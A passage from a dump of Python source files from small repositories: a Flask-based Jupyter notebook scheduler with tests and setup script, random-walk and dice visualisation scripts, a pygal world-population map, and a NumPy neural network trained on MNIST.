yaml.dump(manifest_dict, outfile, default_flow_style=False)
return file_location
def _create_ffdl_zip(self, task):
unique_id = 'ffdl-' + str(task['id'])[:8]
task_directory = os.path.join(self.workdir, unique_id)
os.makedirs(task_directory)
self._write_file(task_directory, "notebook.ipynb", json.dumps(task['notebook']))
if 'dependencies' in task:
for dependency in task['dependencies']:
self._write_file(task_directory, dependency, task['dependencies'][dependency])
self._create_env_sh(task, task_directory)
copyfile(os.path.join(self.runtimedir, "start.sh"),
os.path.join(task_directory, "start.sh"))
copyfile(os.path.join(self.runtimedir, "run_notebook.py"),
os.path.join(task_directory, "run_notebook.py"))
zip_file = os.path.join(self.workdir, '{}.zip'.format(unique_id))
# print('>>> {}'.format(zip_file))
# print('>>> {}'.format(task_directory))
zip_directory(zip_file, task_directory)
return zip_file
def _create_env_sh(self, task, task_directory):
    """Generate ``env.sh`` in *task_directory*, exporting each task env var.

    Keys and values are shell-quoted so arbitrary strings survive sourcing.
    """
    exports = ["export {}={}".format(shlex.quote(key), shlex.quote(value))
               for key, value in task['env'].items()]
    script = "\n".join(["#!/usr/bin/env bash\n"] + exports) + "\n"
    self._write_file(task_directory, "env.sh", script)
@staticmethod
def _write_file(directory, filename, contents):
filename = os.path.join(directory, filename)
with open(filename, 'w') as f:
f.write(str(contents))
|
{"/enterprise_scheduler/executor.py": ["/enterprise_scheduler/util.py"], "/tests/test_scheduler.py": ["/enterprise_scheduler/scheduler.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler_resource.py": ["/enterprise_scheduler/scheduler.py"], "/enterprise_scheduler/scheduler_application.py": ["/enterprise_scheduler/scheduler_resource.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler.py": ["/enterprise_scheduler/executor.py"]}
|
27,951
|
lresende/enterprise_scheduler
|
refs/heads/master
|
/setup.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""The setup script."""

from setuptools import setup, find_packages

# Long description for PyPI comes from the project README.
with open('README.rst') as readme_file:
    readme = readme_file.read()

# Runtime requirements.
# NOTE(review): several entries (bumpversion, flake8, tox, coverage, Sphinx,
# twine, watchdog, wheel) look like development tooling rather than runtime
# dependencies — consider moving them to dev extras; verify before changing.
requirements = [
    'click>=6.0',
    'bumpversion>=0.5.3',
    'wheel>=0.30.0',
    'watchdog>=0.8.3',
    'flake8>=3.5.0',
    'tox>=2.9.1',
    'coverage>=4.5.1',
    'Sphinx>=1.7.1',
    'twine>=1.10.0',
    'nbconvert>=5.3.1',
    'requests >= 2.8, < 3.0',
    'ffdl-client>=0.1.2',
    'flask-restful>=0.3.6',
    'jupyter_enterprise_gateway>=1.0.0'
]

setup_requirements = [ ]

test_requirements = [ ]

setup(
    author="Luciano Resende",
    author_email='lresende@apache.org',
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: Apache Software License',
        'Natural Language :: English',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
    ],
    # NOTE(review): this is still the cookiecutter boilerplate text — replace
    # with a real project description.
    description="Python Boilerplate contains all the boilerplate you need to create a Python package.",
    # Console entry point: `enterprise_scheduler` launches the Flask app.
    entry_points={
        'console_scripts': [
            'enterprise_scheduler=enterprise_scheduler.scheduler_application:main',
        ],
    },
    install_requires=requirements,
    license='Apache License, Version 2.0',
    long_description=readme,
    include_package_data=True,
    keywords='enterprise_scheduler',
    name='enterprise_scheduler',
    packages=find_packages(include=['enterprise_scheduler']),
    setup_requires=setup_requirements,
    test_suite='tests',
    tests_require=test_requirements,
    url='https://github.com/lresende/enterprise_scheduler',
    version='0.1.0.dev2',
    zip_safe=False,
)
|
{"/enterprise_scheduler/executor.py": ["/enterprise_scheduler/util.py"], "/tests/test_scheduler.py": ["/enterprise_scheduler/scheduler.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler_resource.py": ["/enterprise_scheduler/scheduler.py"], "/enterprise_scheduler/scheduler_application.py": ["/enterprise_scheduler/scheduler_resource.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler.py": ["/enterprise_scheduler/executor.py"]}
|
27,952
|
lresende/enterprise_scheduler
|
refs/heads/master
|
/tests/test_scheduler.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""Tests for `enterprise_scheduler` package."""

import asyncio
import os
import json
import unittest
import time

from pprint import pprint

from enterprise_scheduler.scheduler import Scheduler
from enterprise_scheduler.util import fix_asyncio_event_loop_policy

# Directory holding the fixture notebooks used by the tests.
RESOURCES = os.path.join(os.path.dirname(__file__), 'resources')

# NOTE(review): these tests require a live Enterprise Gateway at this host
# (and, below, FfDL/COS credentials) — they are integration tests, not unit
# tests, and will fail without those services.
DEFAULT_GATEWAY = "lresende-elyra:8888"
DEFAULT_KERNELSPEC = "python2"


class TestEnterpriseScheduler(unittest.TestCase):
    """Tests for `enterprise_scheduler` package."""

    # Shared scheduler instance, started once for the whole test class.
    scheduler = None

    @classmethod
    def setUpClass(cls):
        """Set up test fixtures, if any."""
        fix_asyncio_event_loop_policy(asyncio)
        cls.scheduler = Scheduler()
        cls.scheduler.start()

    @classmethod
    def tearDownClass(cls):
        """Tear down test fixtures, if any."""
        cls.scheduler.stop()
        cls.scheduler = None

    def test_execute_jupyter_task_with_embedded_notebook(self):
        # Notebook content is embedded directly in the task payload.
        notebook = self._read_notebook('simple.ipynb')
        task = {}
        task['executor'] = 'jupyter'
        task['endpoint'] = DEFAULT_GATEWAY
        task['kernelspec'] = DEFAULT_KERNELSPEC
        task['notebook'] = notebook
        TestEnterpriseScheduler.scheduler.schedule_task(task)

    def test_execute_jupyter_task_with_remote_notebook(self):
        # Notebook is fetched by the scheduler from a remote URL.
        task = {}
        task['executor'] = 'jupyter'
        task['endpoint'] = DEFAULT_GATEWAY
        task['kernelspec'] = DEFAULT_KERNELSPEC
        task['notebook_location'] = 'http://home.apache.org/~lresende/notebooks/notebook-brunel.ipynb'
        TestEnterpriseScheduler.scheduler.schedule_task(task)

    def test_execute_ffdl_task_with_embedded_notebook(self):
        # FfDL submission; endpoint/credentials are redacted placeholders.
        notebook = self._read_notebook('ffdl.ipynb')
        task = {}
        task['executor'] = 'ffdl'
        task['framework'] = 'tensorflow'
        task['endpoint'] = '##########'
        task['kernelspec'] = 'python3'
        task['user'] = '##########'
        task['userinfo'] = 'bluemix-instance-id=test-user'
        task['cpus'] = 1
        task['gpus'] = 0
        task['memory'] = '1Gb'
        task['cos_endpoint'] = '##########'
        task['cos_user'] = '##########'
        task['cos_password'] = '##########'
        task['notebook'] = notebook
        TestEnterpriseScheduler.scheduler.schedule_task(task)

    def _read_notebook(self, filename):
        # Load a fixture notebook (JSON) from the resources directory.
        filename = os.path.join(RESOURCES, filename)
        with open(filename, 'r') as f:
            return json.load(f)
|
{"/enterprise_scheduler/executor.py": ["/enterprise_scheduler/util.py"], "/tests/test_scheduler.py": ["/enterprise_scheduler/scheduler.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler_resource.py": ["/enterprise_scheduler/scheduler.py"], "/enterprise_scheduler/scheduler_application.py": ["/enterprise_scheduler/scheduler_resource.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler.py": ["/enterprise_scheduler/executor.py"]}
|
27,953
|
lresende/enterprise_scheduler
|
refs/heads/master
|
/enterprise_scheduler/scheduler_resource.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2018-2019 Luciano Resende
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from flask import Response, request
from flask_restful import Resource
from enterprise_scheduler.scheduler import Scheduler
scheduler = Scheduler()
scheduler.start()
class SchedulerResource(Resource):
    """Scheduler REST API used to submit Jupyter Notebooks for batch executions.

    Example:
    curl -X POST -v http://localhost:5000/scheduler/tasks -d "{\"notebook_location\":\"http://home.apache.org/~lresende/notebooks/notebook-brunel.ipynb\"}"
    """

    def __init__(self, default_gateway_host, default_kernelspec):
        # Fallbacks applied to submitted tasks that omit these fields.
        self.default_gateway_host = default_gateway_host
        self.default_kernelspec = default_kernelspec

    def _html_response(self, data):
        """Wrap *data* in a 200 text/plain Flask response."""
        resp = Response(data, mimetype='text/plain', headers=None)
        resp.status_code = 200
        return resp

    def post(self):
        """Accept a JSON task submission and enqueue it on the module scheduler.

        Returns ('submitted', 201) immediately; execution is asynchronous.
        """
        # Note: no `global` declaration needed — the module-level scheduler
        # is only read here, never rebound.
        task = request.get_json(force=True)
        # Fill in defaults for optional fields; `in task` is the idiomatic
        # membership test (no need for .keys()).
        if 'endpoint' not in task:
            task['endpoint'] = self.default_gateway_host
        if 'kernelspec' not in task:
            task['kernelspec'] = self.default_kernelspec
        scheduler.schedule_task(task)
        return 'submitted', 201
|
{"/enterprise_scheduler/executor.py": ["/enterprise_scheduler/util.py"], "/tests/test_scheduler.py": ["/enterprise_scheduler/scheduler.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler_resource.py": ["/enterprise_scheduler/scheduler.py"], "/enterprise_scheduler/scheduler_application.py": ["/enterprise_scheduler/scheduler_resource.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler.py": ["/enterprise_scheduler/executor.py"]}
|
27,954
|
lresende/enterprise_scheduler
|
refs/heads/master
|
/enterprise_scheduler/scheduler_application.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2018-2019 Luciano Resende
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Enterprise Scheduler - Schedule Notebook execution."""
import os
import sys
import asyncio
import click
from flask import Flask
from flask_restful import Api
from enterprise_scheduler.scheduler_resource import SchedulerResource
from enterprise_scheduler.util import fix_asyncio_event_loop_policy
server_name = os.getenv('SERVER_NAME','127.0.0.1:5000')
@click.command()
@click.option('--gateway_host', default='lresende-elyra:8888', help='Jupyter Enterprise Gateway host information')
@click.option('--kernelspec', default='python2', help='Jupyter Notebook kernelspec to use while executing notebook')
def main(gateway_host, kernelspec):
"""Jupyter Enterprise Scheduler - Schedule Notebook execution."""
click.echo('Starting Scheduler at {} using Gateway at {} with default kernelspec {}'.format(server_name, gateway_host, kernelspec))
click.echo('Add new tasks via post commands to http://{}/scheduler/tasks '.format(server_name))
fix_asyncio_event_loop_policy(asyncio)
app = Flask('Notebook Scheduler')
api = Api(app)
api.add_resource(SchedulerResource, '/scheduler/tasks',
resource_class_kwargs={ 'default_gateway_host': gateway_host, 'default_kernelspec': kernelspec })
print('Add new tasks via http://{}/scheduler/tasks '.format(server_name))
server_parts = server_name.split(':')
app.run(host=server_parts[0], port=int(server_parts[1]), debug=True, use_reloader=False)
return 0
if __name__ == "__main__":
sys.exit(main()) # pragma: no cover
|
{"/enterprise_scheduler/executor.py": ["/enterprise_scheduler/util.py"], "/tests/test_scheduler.py": ["/enterprise_scheduler/scheduler.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler_resource.py": ["/enterprise_scheduler/scheduler.py"], "/enterprise_scheduler/scheduler_application.py": ["/enterprise_scheduler/scheduler_resource.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler.py": ["/enterprise_scheduler/executor.py"]}
|
27,955
|
lresende/enterprise_scheduler
|
refs/heads/master
|
/enterprise_scheduler/scheduler.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2018-2019 Luciano Resende
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import queue
import uuid
from threading import Thread
from urllib.request import urlopen
from enterprise_scheduler.executor import JupyterExecutor, FfDLExecutor
class Scheduler:
    """Thread-pool task scheduler dispatching notebook tasks to executors."""

    def __init__(self, default_gateway_host=None, default_kernelspec=None, number_of_threads=5):
        self.default_gateway_host = default_gateway_host
        self.default_kernelspec = default_kernelspec
        self.number_of_threads = number_of_threads
        self.executors = {}
        self.executors[JupyterExecutor.TYPE] = JupyterExecutor()
        self.executors[FfDLExecutor.TYPE] = FfDLExecutor()
        # Bug fix: plain FIFO queue. Tasks are dicts, which are not orderable,
        # so a PriorityQueue raised TypeError as soon as two queued tasks had
        # to be compared during heap maintenance.
        self.queue = queue.Queue()
        self.executor_threads = []
        self.running = False

    def _executor(self):
        """Worker loop: pull tasks until stop() clears self.running."""
        while self.running:
            try:
                # Blocking get with a timeout instead of busy-polling empty();
                # the timeout lets the thread notice self.running changes.
                task = self.queue.get(timeout=0.5)
            except queue.Empty:
                continue
            self._execute_task(task)
            self.queue.task_done()

    def _execute_task(self, task):
        """Dispatch *task* to the executor matching its 'executor' field."""
        executor_type = task['executor'].lower()  # Jupyter, Docker, FfDL
        executor = self.executors[executor_type]
        executor.execute_task(task)

    def schedule_task(self, task):
        """Validate *task*, resolve a remote notebook if given, and enqueue it.

        Returns the generated task id (uuid4). Raises ValueError when
        required fields are missing.
        """
        task_id = uuid.uuid4()  # renamed local: don't shadow builtin id()
        task['id'] = task_id
        if 'notebook_location' in task:
            notebook_location = task['notebook_location']
            task['notebook'] = self._read_remote_notebook_content(notebook_location)
        self._validate_task(task)
        print('adding task [{}] to queue:\n {}'.format(task_id, str(task)))
        self.queue.put(item=task)
        return task_id

    def start(self):
        """Spawn the worker threads."""
        self.running = True
        # Bug fix: range(self.number_of_threads) — the original
        # range(1, number_of_threads) started one thread fewer than requested.
        for _ in range(self.number_of_threads):
            t = Thread(target=self._executor)
            t.daemon = True
            self.executor_threads.append(t)
            t.start()

    def stop(self):
        """Signal the workers to exit and wait for them to finish."""
        self.running = False
        for t in self.executor_threads:
            t.join()

    @staticmethod
    def _validate_task(task):
        """Raise ValueError for any missing mandatory task field."""
        if 'executor' not in task:
            raise ValueError('Submitted task is missing [executor] information')
        if 'endpoint' not in task:
            raise ValueError('Submitted task is missing [endpoint] information')
        if 'kernelspec' not in task:
            raise ValueError('Submitted task is missing [kernelspec] information')
        if 'notebook_location' not in task and 'notebook' not in task:
            raise ValueError('Submitted task is missing notebook information (either notebook_location or notebook)')

    @staticmethod
    def _read_remote_notebook_content(notebook_location):
        """Fetch notebook content over HTTP; wrap failures in a descriptive error."""
        try:
            return urlopen(notebook_location).read().decode()
        except BaseException as base:
            raise Exception('Error reading notebook source "{}": {}'.format(notebook_location, base))
|
{"/enterprise_scheduler/executor.py": ["/enterprise_scheduler/util.py"], "/tests/test_scheduler.py": ["/enterprise_scheduler/scheduler.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler_resource.py": ["/enterprise_scheduler/scheduler.py"], "/enterprise_scheduler/scheduler_application.py": ["/enterprise_scheduler/scheduler_resource.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler.py": ["/enterprise_scheduler/executor.py"]}
|
27,956
|
taotao234/test
|
refs/heads/master
|
/random_wallk.py
|
from random import choice
class RandomWalk():
    """Generate the point data for a 2-D random walk starting at the origin."""

    def __init__(self, num_points=5000):
        """Initialize walk attributes; x/y start with the origin point."""
        self.num_points = num_points
        self.x = [0]
        self.y = [0]

    @staticmethod
    def _random_step():
        """One axis step: random direction (±1) times random distance (0-4)."""
        return choice([1, -1]) * choice([0, 1, 2, 3, 4])

    def fill_walk(self):
        """Take random steps until the walk contains num_points points."""
        while len(self.x) < self.num_points:
            step_x = self._random_step()
            step_y = self._random_step()
            # Reject steps that go nowhere.
            if step_x == 0 and step_y == 0:
                continue
            self.x.append(self.x[-1] + step_x)
            self.y.append(self.y[-1] + step_y)
|
{"/die_visual.py": ["/die.py"]}
|
27,957
|
taotao234/test
|
refs/heads/master
|
/world_population.py
|
import json
from country_codes import get_country_code
import pygal
from pygal.style import RotateStyle as RS, LightColorizedStyle as LCS

# Load the population data into a list.
filename = 'population_data.json'
with open(filename) as f:
    pop_data = json.load(f)

# Build a dict of 2010 populations keyed by two-letter country code.
cc_populations = {}
for pop_dict in pop_data:
    if pop_dict['Year'] == '2010':
        country_name = pop_dict['Country Name']
        # Values arrive as strings like "1234.5" — go through float first.
        population = int(float(pop_dict['Value']))
        code = get_country_code(country_name)
        if code:
            cc_populations[code] = population

# Split the countries into three population tiers
# (daguo = large, zhongguo = medium, xiaoguo = small).
daguo, zhongguo, xiaoguo = {}, {}, {}
for cc, pop in cc_populations.items():
    if pop < 10000000:
        xiaoguo[cc] = pop
    elif pop < 1000000000:
        zhongguo[cc] = pop
    else:
        daguo[cc] = pop

print (len(daguo), len(zhongguo), len(xiaoguo))

# Render the tiered world map to an SVG file.
wm_style = RS('#336699', base_style=LCS)
wm = pygal.maps.world.World(style=wm_style)
wm.title = '2010世界人口'
wm.add('大国', daguo)
wm.add('中等', zhongguo)
wm.add('小国', xiaoguo)
wm.render_to_file('world_population_sandeng.svg')
|
{"/die_visual.py": ["/die.py"]}
|
27,958
|
taotao234/test
|
refs/heads/master
|
/die_visual.py
|
from die import Die
import pygal

# Create two six-sided dice.
die_1 = Die()
die_2 = Die()

# Roll the dice and store the summed results.
results = []
for roll_num in range(1000):
    result = die_1.roll() + die_2.roll()
    results.append(result)

# Analyze: count how often each possible sum (2..12 for two D6) occurred.
frequencies = []
max_result = die_1.mianshu + die_2.mianshu
for value in range(2, max_result + 1):
    frequency = results.count(value)
    frequencies.append(frequency)

# Visualize the results.
hist = pygal.Bar()
# Bug fix: labels must cover every possible two-die sum (2..max_result), not
# 1..6 — frequencies has 11 entries and the labels must line up with them.
hist.x_labels = [str(value) for value in range(2, max_result + 1)]
hist.title = 'roll D6'
hist.x_title = 'dianshu'
# Bug fix: the attribute was misspelled `y_titel`, so pygal never saw it.
hist.y_title = 'cishu'
hist.add('d6+d6', frequencies)
# Bug fix: extension was '.vsg'; pygal renders SVG files.
hist.render_to_file('die_visuals.svg')
|
{"/die_visual.py": ["/die.py"]}
|
27,959
|
taotao234/test
|
refs/heads/master
|
/die.py
|
from random import randint
class Die():
    """A single die with a configurable number of sides."""

    def __init__(self, mianshu=6):
        """Store the side count; defaults to a standard six-sided die."""
        self.mianshu = mianshu

    def roll(self):
        """Return a uniformly random face value between 1 and mianshu."""
        return randint(1, self.mianshu)
|
{"/die_visual.py": ["/die.py"]}
|
27,971
|
erikbenton/neural_network_practice
|
refs/heads/master
|
/neural_network.py
|
import numpy as np
import math
import matplotlib as plt
import mnist_loader
import random
import json
import sys
class CrossEntropyCost:
    """Cross-entropy cost C = -Σ [y ln(a) + (1 - y) ln(1 - a)]."""

    @staticmethod
    def fn(a, y):
        """Cost of output activations *a* against targets *y* (nan-safe)."""
        per_neuron = -y * np.log(a) - (1 - y) * np.log(1 - a)
        # nan_to_num handles the 0 * log(0) = nan case at saturated outputs.
        return np.sum(np.nan_to_num(per_neuron))

    @staticmethod
    def delta(z, a, y):
        """Output-layer error; the σ'(z) factor cancels for this cost."""
        return np.subtract(a, y)
class QuadraticCost:
    """Quadratic (mean-squared-error) cost C = 0.5 * ||a - y||^2."""

    @staticmethod
    def fn(a, y):
        """Cost of output activations *a* against targets *y*."""
        return 0.5 * np.linalg.norm(np.subtract(a, y))**2

    @staticmethod
    def delta(z, a, y):
        """Output-layer error delta = (a - y) ⊙ σ'(z).

        Bug fix: this must be the elementwise (Hadamard) product per the
        backprop output-error equation — np.matmul of two (n, 1) column
        vectors raises a shape error and is mathematically wrong here.
        """
        return np.subtract(a, y) * sigmoid_prime(z)
class Network:
    """Feed-forward neural network trained with mini-batch SGD.

    *sizes*, e.g. [784, 30, 10], gives the number of neurons per layer
    (input layer first).
    """

    def __init__(self, sizes, cost=CrossEntropyCost):
        # Number of neural layers in the network
        self.num_layers: int = len(sizes)
        # Neurons per layer, input layer first (fixed annotation: a sequence,
        # not an int).
        self.sizes: list = sizes
        self.biases: list = []
        self.weights: list = []
        self.default_weight_initializer()
        self.cost = cost

    def default_weight_initializer(self):
        """Gaussian init: biases ~ N(0,1); weights ~ N(0, 1/sqrt(fan_in))."""
        # No biases are set for the input layer.
        self.biases = [np.random.randn(y, 1) for y in self.sizes[1:]]
        # Bug fix: adjacent-layer pairs must come from zip(); iterating the
        # bare 2-tuple (sizes[:-1], sizes[1:]) unpacked the lists themselves
        # and only "worked" by accident for exactly three-layer networks.
        self.weights = [np.random.randn(y, x) / np.sqrt(x)
                        for x, y in zip(self.sizes[:-1], self.sizes[1:])]

    def large_weight_initializer(self):
        """Gaussian init with SD 1 for both biases and weights (legacy scheme)."""
        self.biases = [np.random.randn(y, 1) for y in self.sizes[1:]]
        # Same zip() fix as default_weight_initializer.
        self.weights = [np.random.randn(y, x)
                        for x, y in zip(self.sizes[:-1], self.sizes[1:])]

    def feed_forward(self, a):
        """Return the network output for input activation column vector *a*."""
        for b, w in zip(self.biases, self.weights):
            a = sigmoid(np.dot(w, a) + b)
        return a

    def sgd(self, training_data, epochs, mini_batch_size, learning_rate,
            lmbda=0.0,
            evaluation_data=None,
            monitor_evaluation_cost=False,
            monitor_evaluation_accuracy=False,
            monitor_training_cost=False,
            monitor_training_accuracy=False):
        """Mini-batch stochastic gradient descent with L2 regularization.

        Returns four per-epoch history lists:
        (evaluation_cost, evaluation_accuracy, training_cost, training_accuracy).
        """
        if evaluation_data:
            n_test = len(evaluation_data)
        n = len(training_data)
        evaluation_cost, evaluation_accuracy = [], []
        training_cost, training_accuracy = [], []
        for j in range(epochs):
            random.shuffle(training_data)
            mini_batches = [training_data[k:k + mini_batch_size]
                            for k in range(0, n, mini_batch_size)]
            for mini_batch in mini_batches:
                self.update_mini_batch_matrix(mini_batch, learning_rate, lmbda, n)
            print("Epoch {0} training complete".format(j))
            if monitor_training_cost:
                cost = self.total_cost(training_data, lmbda)
                training_cost.append(cost)
                print("Cost on training data: {0}".format(cost))
            if monitor_training_accuracy:
                accuracy = self.accuracy(training_data, convert=True)
                training_accuracy.append(accuracy)
                print("Accuracy on the training data: {0} / {1}".format(accuracy, n))
            if monitor_evaluation_cost:
                cost = self.total_cost(evaluation_data, lmbda, convert=True)
                evaluation_cost.append(cost)
                print("Cost on evaluation data: {}".format(cost))
            if monitor_evaluation_accuracy:
                accuracy = self.accuracy(evaluation_data)
                evaluation_accuracy.append(accuracy)
                print("Accuracy on the evaluation data: {0} / {1}".format(accuracy, n_test))
        return evaluation_cost, evaluation_accuracy, training_cost, training_accuracy

    def update_mini_batch(self, mini_batch, learning_rate, lmbda, n):
        """Per-example gradient-accumulation variant of one SGD step.

        *n* is the full training-set size (needed for the L2 decay term).
        """
        # nabla - the upside-down greek Delta (gradient accumulators)
        nabla_b = [np.zeros(b.shape) for b in self.biases]
        nabla_w = [np.zeros(w.shape) for w in self.weights]
        for x, y in mini_batch:
            delta_nabla_b, delta_nabla_w = self.backwards_propagation(x, y)
            # Accumulate each example's gradient (must happen per example,
            # inside the loop; the unused delta_nablas list was dropped).
            nabla_b = [nb + dnb for nb, dnb in zip(nabla_b, delta_nabla_b)]
            nabla_w = [nw + dnw for nw, dnw in zip(nabla_w, delta_nabla_w)]
        # L2 regularization shrinks weights by (1 - lr*lmbda/n) each step.
        self.weights = [(1 - learning_rate * (lmbda / n)) * w
                        - (learning_rate / len(mini_batch)) * nw
                        for w, nw in zip(self.weights, nabla_w)]
        self.biases = [b - (learning_rate / len(mini_batch)) * nb
                       for b, nb in zip(self.biases, nabla_b)]

    def backwards_propagation(self, x, y):
        """Return (nabla_b, nabla_w): cost gradients for one example (x, y)."""
        nabla_b = [np.zeros(b.shape) for b in self.biases]
        nabla_w = [np.zeros(w.shape) for w in self.weights]
        # feed forward
        activation = x
        # Layer by layer list of the activations
        activations = [x]
        # Layer by layer list to store all the z vectors
        zs = []
        for b, w in zip(self.biases, self.weights):
            z = np.dot(w, activation) + b
            zs.append(z)
            activation = sigmoid(z)
            activations.append(activation)
        # Backward pass: output-layer error from the cost's delta rule.
        delta = self.cost.delta(zs[-1], activations[-1], y)
        nabla_b[-1] = delta
        nabla_w[-1] = np.dot(delta, activations[-2].transpose())
        # Propagate the error backwards through the hidden layers.
        for i in range(2, self.num_layers):
            z = zs[-i]
            sp = sigmoid_prime(z)
            delta = np.dot(self.weights[-i + 1].transpose(), delta) * sp
            nabla_b[-i] = delta
            nabla_w[-i] = np.dot(delta, activations[-i - 1].transpose())
        return nabla_b, nabla_w

    def update_mini_batch_matrix(self, mini_batch, learning_rate, lmbda, n):
        """One SGD step processing the whole mini-batch as column-stacked matrices."""
        # Stack inputs/targets as columns: shape (features, batch).
        xs = np.array([x for x, y in mini_batch]).reshape(len(mini_batch), self.sizes[0]).transpose()
        ys = np.array([y for x, y in mini_batch]).reshape(len(mini_batch), self.sizes[-1]).transpose()
        nabla_b, nabla_w = self.backwards_propagation_matrix(xs, ys)
        self.weights = [(1 - learning_rate * (lmbda / n)) * w
                        - (learning_rate / len(mini_batch)) * nw
                        for w, nw in zip(self.weights, nabla_w)]
        self.biases = [b - (learning_rate / len(mini_batch)) * nb
                       for b, nb in zip(self.biases, nabla_b)]

    def backwards_propagation_matrix(self, xs, ys):
        """Vectorized backprop over a whole mini-batch (columns = examples)."""
        nabla_b = [np.zeros(b.shape) for b in self.biases]
        nabla_w = [np.zeros(w.shape) for w in self.weights]
        # feed forward
        activation = xs
        # Layer by layer list of the activations
        activations = [xs]
        # Layer by layer list to store all the z vectors
        zs = []
        for b, w in zip(self.biases, self.weights):
            # Broadcast the bias column across the batch.
            biases = np.tile(b, (1, np.shape(xs)[1]))
            z = np.matmul(w, activation) + biases
            zs.append(z)
            activation = sigmoid(z)
            activations.append(activation)
        # Backward pass
        delta = self.cost.delta(zs[-1], activations[-1], ys)
        # Bug fix: sum the error over the batch dimension. The ones vector
        # must have delta.shape[1] (batch size) rows — np.ones((sizes[-1], 1))
        # only worked when the batch size happened to equal the output size.
        nabla_b[-1] = np.matmul(delta, np.ones((delta.shape[1], 1)))
        nabla_w[-1] = np.matmul(delta, activations[-2].transpose())
        for i in range(2, self.num_layers):
            z = zs[-i]
            sp = sigmoid_prime(z)
            delta = np.matmul(self.weights[-i + 1].transpose(), delta) * sp
            nabla_b[-i] = np.matmul(delta, np.ones((delta.shape[1], 1)))
            nabla_w[-i] = np.matmul(delta, activations[-i - 1].transpose())
        return nabla_b, nabla_w

    def accuracy(self, data, convert=False):
        """Count inputs in *data* classified correctly.

        The network's answer is the index of the highest-activation output
        neuron. *convert* is True when labels are one-hot vectors (training
        data) rather than plain digits (validation/test data).
        """
        if convert:
            results = [(np.argmax(self.feed_forward(x)), np.argmax(y)) for x, y in data]
        else:
            results = [(np.argmax(self.feed_forward(x)), y) for x, y in data]
        return sum(int(x == y) for x, y in results)

    def total_cost(self, data, lmbda, convert=False):
        """Average cost over *data* plus the L2 regularization term.

        *convert* is True when labels are plain digits and must be one-hot
        encoded before computing the cost.
        """
        cost: float = 0.0
        for x, y in data:
            a = self.feed_forward(x)
            if convert:
                y = vectorized_result(y)
            cost += self.cost.fn(a, y) / len(data)
        cost += 0.5 * (lmbda / len(data)) * sum(np.linalg.norm(w)**2 for w in self.weights)
        return cost

    def save(self, filename):
        """Save the network (sizes, weights, biases, cost name) as JSON."""
        # Bug fix: tolist() converts nested ndarrays all the way down;
        # list(w) produced a list of ndarray rows, which json.dump rejects.
        data = {"sizes": self.sizes,
                "weights": [w.tolist() for w in self.weights],
                "biases": [b.tolist() for b in self.biases],
                "cost": str(self.cost.__name__)}
        with open(filename, "w") as f:
            json.dump(data, f)

    def evaluate(self, test_data):
        """Count test examples whose argmax output matches the integer label."""
        test_results = [(np.argmax(self.feed_forward(x)), y) for (x, y) in test_data]
        return sum(int(x == y) for (x, y) in test_results)
def load(filename):
    """Reconstruct a saved Network from the JSON file *filename*."""
    with open(filename, "r") as fh:
        data = json.load(fh)
    # Resolve the cost class by name from this module.
    cost = getattr(sys.modules[__name__], data["cost"])
    net = Network(data["sizes"], cost=cost)
    net.weights = [np.array(w) for w in data["weights"]]
    net.biases = [np.array(b) for b in data["biases"]]
    return net
def vectorized_result(j):
    """Return a 10-dimensional one-hot column vector with 1.0 at index *j*."""
    one_hot = np.zeros((10, 1))
    one_hot[j] = 1.0
    return one_hot
def sigmoid(z):
    """Logistic sigmoid 1 / (1 + e^(-z)), applied elementwise on arrays."""
    exp_neg = np.exp(-z)
    return 1.0 / (1 + exp_neg)
def cost_derivative(output_activations, y):
    """Derivative of the quadratic cost w.r.t. the output activations: (a - y)."""
    diff = np.subtract(output_activations, y)
    return diff
def sigmoid_prime(z):
    """Derivative of the sigmoid: σ(z) * (1 - σ(z)), computed elementwise."""
    # Sigmoid inlined so this helper is self-contained.
    s = 1.0 / (1 + np.exp(-z))
    return s * (1 - s)
# Train a 784-30-10 network on MNIST with full monitoring enabled.
# NOTE(review): this runs at import time — consider guarding it with
# `if __name__ == "__main__":` so importing the module doesn't train.
training_data, validation_data, test_data = mnist_loader.load_data_wrapper()
net = Network([784, 30, 10])
net.sgd(training_data, 30, 10, 0.5,
        lmbda=5.0,
        evaluation_data=validation_data,
